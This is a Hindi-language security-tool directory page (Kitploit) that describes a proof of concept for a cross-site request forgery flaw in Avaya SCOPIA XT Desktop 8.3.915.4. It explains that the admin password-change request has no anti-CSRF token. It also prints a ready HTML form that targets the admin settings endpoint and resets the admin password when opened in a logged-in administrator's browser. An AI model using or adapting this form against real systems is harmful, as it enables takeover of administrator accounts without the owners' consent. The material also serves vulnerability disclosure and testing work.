Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — प्रूफ ऑफ कॉन्सेप्ट जो Avaya SCOPIA XT Desktop पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) का प्रदर्शन करता है, जिससे बिना एंटी-CSRF टोकन के एडमिन पासवर्ड बदला जा सकता है। | Kitploit
उपकरण/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

प्रूफ ऑफ कॉन्सेप्ट जो Avaya SCOPIA XT Desktop पर क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) का प्रदर्शन करता है, जिससे बिना एंटी-CSRF टोकन के एडमिन पासवर्ड बदला जा सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

SCOPIA XT Desktop संस्करण 8.3.915.4 पर CSRF का शोषण

यह PoC वर्णन करेगा कि SCOPIA XT Desktop संस्करण 8.3.915.4 पर क्रॉस-साइट रिक्वेस्ट (CSRF) फोर्जरी का पता कैसे लगाया जाए


SCOPIA के बारे में

वेबसाइट: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) के बारे में

क्रॉस-साइट रिक्वेस्ट फोर्जरी, जिसे वन-क्लिक अटैक या सेशन राइडिंग के रूप में भी जाना जाता है और CSRF या XSRF के रूप में संक्षिप्त किया जाता है, एक वेबसाइट का एक प्रकार का दुर्भावनापूर्ण शोषण है जहां अनधिकृत कमांड उस उपयोगकर्ता से प्रेषित होते हैं जिस पर वेब एप्लिकेशन भरोसा करता है।


प्रूफ ऑफ कॉन्सेप्ट - एडमिन पासवर्ड बदलें

1

"Directory and Authentication" पेज पर, व्यवस्थापक अपना पासवर्ड बदलने में सक्षम है।

2

Burp Suite के साथ रिक्वेस्ट को कैप्चर करते हुए मैं देख सकता था कि कोई एंटी-CSRF टोकन लागू नहीं किया गया था और एकमात्र सुरक्षा तंत्र सेशन कुकी है।

6

मैंने यह HTML फ़ाइल बनाई जो प्रस्तुत कमजोरी का शोषण करने के लिए PoC के रूप में कार्य करती थी।

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

जब इसे उस ब्राउज़र में चलाया गया जिसमें SCOPIA XT Desktop प्रशासन वातावरण के लिए एक मान्य कुकी है, तो एडमिन उपयोगकर्ता का पासवर्ड बदलकर "attacker" करना संभव था:

4

5

टूल डाउनलोड करें